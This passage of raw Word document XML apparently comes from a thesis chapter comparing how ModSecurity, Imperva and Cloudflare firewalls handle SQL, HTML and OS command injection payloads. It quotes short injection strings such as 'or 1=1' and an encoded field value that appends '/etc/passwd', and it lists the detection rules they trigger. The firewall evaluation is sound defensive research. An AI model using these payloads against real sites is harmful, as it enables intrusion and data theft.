        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>ModSecurity was able to block all the SQL injection payloads, while Imperva allowed 14 through and Cloudlfare allowed 18.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B69DFB2" w14:textId="17605B78" w:rsidR="00330B50" w:rsidRDefault="00330B50" w:rsidP="00BD5AA5">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">One of the payloads, </w:t>
      </w:r>
      <w:r w:rsidRPr="000667E9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>‘or”=’</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>, was allowed through by both Imperva and</w:t>
      </w:r>
      <w:r w:rsidR="00390AE5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Cloudflare</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00A51735">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> This particular payload was blocked by ModSecurity. </w:t>
      </w:r>
      <w:r w:rsidR="00C97EF7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">Rule ID 960024, </w:t>
      </w:r>
      <w:r w:rsidR="00C97EF7" w:rsidRPr="00C97EF7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>"Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"</w:t>
      </w:r>
      <w:r w:rsidR="00C97EF7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> was triggered. The rule was triggered due to the repetition of the character ‘. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33F87147" w14:textId="1546B184" w:rsidR="00A51735" w:rsidRDefault="000667E9" w:rsidP="00BD5AA5">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">The payload </w:t>
      </w:r>
      <w:r w:rsidRPr="000667E9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>or 1=1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> was blocked was blocked by ModSecurity and Imperva but allowed by Cloudflare. </w:t>
      </w:r>
      <w:r w:rsidR="003D15CC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">Imperva’s rule was triggered due to the payload attempted on request parameter id with the threat pattern </w:t>
      </w:r>
      <w:r w:rsidR="003D15CC" w:rsidRPr="000C3B9C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>id=or%201%3d1</w:t>
      </w:r>
      <w:r w:rsidR="003D15CC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00653607">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> The payload attempted was accurately detected by Imperva.</w:t>
      </w:r>
      <w:r w:rsidR="0070244B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00792DA5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>The identified threat pattern shows that Imperva also detects encoded values of the string.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="265272DF" w14:textId="78D4A585" w:rsidR="00224040" w:rsidRDefault="00390AE5" w:rsidP="00BD5AA5">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">The payload </w:t>
      </w:r>
      <w:r w:rsidRPr="00390AE5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>‘or’’=’</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> was blocked by all three WAFs. Both Imperva and Cloudflare </w:t>
      </w:r>
      <w:r w:rsidR="00E17D83">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">identified and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">triggered their rule by the </w:t>
      </w:r>
      <w:r w:rsidR="00C924AB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>similar query strings</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00DB02BE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C924AB" w:rsidRPr="00E17D83">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>?id=%27or%27%27%3D%27</w:t>
      </w:r>
      <w:r w:rsidR="00C924AB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C924AB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>and</w:t>
      </w:r>
      <w:r w:rsidRPr="00E17D83">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> ?id=%27or%27%27%3D%27&amp;Submit=Submit</w:t>
      </w:r>
      <w:r w:rsidR="00C924AB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C924AB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>respectively</w:t>
      </w:r>
      <w:r w:rsidR="00E17D83">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00DB02BE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> The rule by Cloudflare that blocked this request was identified with rule ID </w:t>
      </w:r>
      <w:r w:rsidR="00DB02BE" w:rsidRPr="00DB02BE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>100097F</w:t>
      </w:r>
      <w:r w:rsidR="00DB02BE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E3C597E" w14:textId="66AFF1A1" w:rsidR="008733A7" w:rsidRPr="00DE6606" w:rsidRDefault="0034265E" w:rsidP="0034265E">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:bookmarkStart w:id="69" w:name="_Toc71138505"/>
      <w:r>
        <w:t xml:space="preserve">4.4.3 </w:t>
      </w:r>
      <w:r w:rsidR="008733A7" w:rsidRPr="00DE6606">
        <w:t>HTML injection</w:t>
      </w:r>
      <w:bookmarkEnd w:id="69"/>
    </w:p>
    <w:p w14:paraId="38673A68" w14:textId="41B73717" w:rsidR="000C3B9C" w:rsidRDefault="000C3B9C" w:rsidP="00BD5AA5">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>ModSecurity was observed to have blocked all of the HTML injection payloads</w:t>
      </w:r>
      <w:r w:rsidR="0027593B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>, while Imperva and Cloudflare only blocked one out of the 116 payloads</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76F90BB7" w14:textId="67D93AD7" w:rsidR="00664730" w:rsidRDefault="00664730" w:rsidP="00BD5AA5">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">Most of the payloads that were blocked by ModSecurity were blocked by rule ID 973300, </w:t>
      </w:r>
      <w:r w:rsidRPr="00664730">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>"Possible XSS Attack Detected - HTML Tag Handler"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>. This rule blocks requests that contains HTML tags.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63C7BC6E" w14:textId="09E743A6" w:rsidR="008733A7" w:rsidRPr="00DE6606" w:rsidRDefault="000C3B9C" w:rsidP="00BD5AA5">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">The only payload that was blocked by </w:t>
      </w:r>
      <w:r w:rsidR="00B80586">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>all three WAFs, including</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Imperva’s and Cloudflare’s cloud WAFs</w:t>
      </w:r>
      <w:r w:rsidR="00B1182B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> was </w:t>
      </w:r>
      <w:r w:rsidR="00B1182B" w:rsidRPr="00B1182B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>&lt;script&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00B1182B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Although essentially, the script tag is a HTML tag, it is commonly used for XSS. As such, the request was blocked by both Imperva and Cloudflare</w:t>
      </w:r>
      <w:r w:rsidR="00E17D83">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00E73576">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002D766A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">ModSecurity and </w:t>
      </w:r>
      <w:r w:rsidR="00E73576">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Imperva classified this payload as XSS attempt</w:t>
      </w:r>
      <w:r w:rsidR="002D766A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> due to the script tag</w:t>
      </w:r>
      <w:r w:rsidR="00E73576">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00E17D83">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Cloudflare </w:t>
      </w:r>
      <w:r w:rsidR="00D6232D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>also classified it as XSS but also identified it as HTML injection,</w:t>
      </w:r>
      <w:r w:rsidR="00E17D83">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> “XSS, HTML Injection – Script Tag”</w:t>
      </w:r>
      <w:r w:rsidR="003937E0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> with rule ID 100173</w:t>
      </w:r>
      <w:r w:rsidR="00B1182B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63AAE924" w14:textId="1420F546" w:rsidR="008733A7" w:rsidRPr="00DE6606" w:rsidRDefault="0034265E" w:rsidP="0034265E">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:bookmarkStart w:id="70" w:name="_Toc71138506"/>
      <w:r>
        <w:t xml:space="preserve">4.4.5 </w:t>
      </w:r>
      <w:r w:rsidR="008733A7" w:rsidRPr="00DE6606">
        <w:t>OS command injection</w:t>
      </w:r>
      <w:bookmarkEnd w:id="70"/>
    </w:p>
    <w:p w14:paraId="67F9D0ED" w14:textId="509990B9" w:rsidR="000600C6" w:rsidRDefault="002458D5" w:rsidP="00BD5AA5">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">OS command injection was the least blocked attack vector for all three WAFs. </w:t>
      </w:r>
      <w:r w:rsidR="000600C6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>ModSecurity managed to block four while Imperva and Cloudflare managed to block only one out of the 143 payloads.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E51DE41" w14:textId="2BFE0050" w:rsidR="00176A8C" w:rsidRPr="006C7D8C" w:rsidRDefault="00176A8C" w:rsidP="00BD5AA5">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">The four payloads that ModSecurity managed to block were </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>shutdown</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>wget</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>/etc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>/etc/passwd</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="006C7D8C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> The payloads </w:t>
      </w:r>
      <w:r w:rsidR="006C7D8C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>shutdown</w:t>
      </w:r>
      <w:r w:rsidR="006C7D8C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidR="006C7D8C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>wget</w:t>
      </w:r>
      <w:r w:rsidR="006C7D8C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> were blocked by rule ID 959073, </w:t>
      </w:r>
      <w:r w:rsidR="006C7D8C" w:rsidRPr="006C7D8C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>"SQL Injection Attack"</w:t>
      </w:r>
      <w:r w:rsidR="006C7D8C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> and rule ID 950907, </w:t>
      </w:r>
      <w:r w:rsidR="006C7D8C" w:rsidRPr="006C7D8C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>"System Command Injection"</w:t>
      </w:r>
      <w:r w:rsidR="006C7D8C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> respectively.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="004697D5" w14:textId="42D2A7E1" w:rsidR="007C6538" w:rsidRDefault="002148DA" w:rsidP="00BD5AA5">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">The only payload that was blocked by Imperva and Cloudflare was </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>/etc/passwd</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> which is also blocked by ModSecurity</w:t>
      </w:r>
      <w:r w:rsidR="0077170F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">’s rule ID 960024, </w:t>
      </w:r>
      <w:r w:rsidR="0077170F" w:rsidRPr="0077170F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>"Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00FA1EF4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00960D1F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>The matched data that triggered the rule was “</w:t>
      </w:r>
      <w:r w:rsidR="00960D1F" w:rsidRPr="00960D1F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>; /</w:t>
      </w:r>
      <w:r w:rsidR="00960D1F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>” and not the payload itself.</w:t>
      </w:r>
      <w:r w:rsidR="000600C6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> This rule also blocked the payload </w:t>
      </w:r>
      <w:r w:rsidR="000600C6" w:rsidRPr="000600C6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>/etc</w:t>
      </w:r>
      <w:r w:rsidR="000600C6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> with the same matched data.</w:t>
      </w:r>
      <w:r w:rsidR="00176A8C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="007C6538">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">Imperva detected the threat pattern as </w:t>
      </w:r>
      <w:r w:rsidR="007C6538" w:rsidRPr="007C6538">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>ip=1.1.1.1%20%3b%20%2fetc%2fpasswd</w:t>
      </w:r>
      <w:r w:rsidR="007C6538">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00EB7228">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>and</w:t>
      </w:r>
      <w:r w:rsidR="007C6538">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> it was classified as </w:t>
      </w:r>
      <w:r w:rsidR="00C75B11">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">an </w:t>
      </w:r>
      <w:r w:rsidR="007C6538">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>illegal resource access.</w:t>
      </w:r>
      <w:r w:rsidR="009A7B9A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Meanwhile, Cloudflare’s rule ID 100005 was triggered, classified as “</w:t>
      </w:r>
      <w:r w:rsidR="009A7B9A" w:rsidRPr="009A7B9A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>File Inclusion - CVE:CVE-2018-9126, CVE:CVE-2011-1892</w:t>
      </w:r>
      <w:r w:rsidR="009A7B9A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>”, however, with an empty query string.</w:t>
      </w:r>
      <w:r w:rsidR="001214A0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> As such, it is not possible to determine how the request triggered Cloudflare’s rule.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A346EBC" w14:textId="7481A79D" w:rsidR="00654843" w:rsidRPr="008D4C7D" w:rsidRDefault="002B0490" w:rsidP="008D4C7D">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DE6606">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">Using combinations of the payloads that were found to not have been blocked by the WAFs, </w:t>
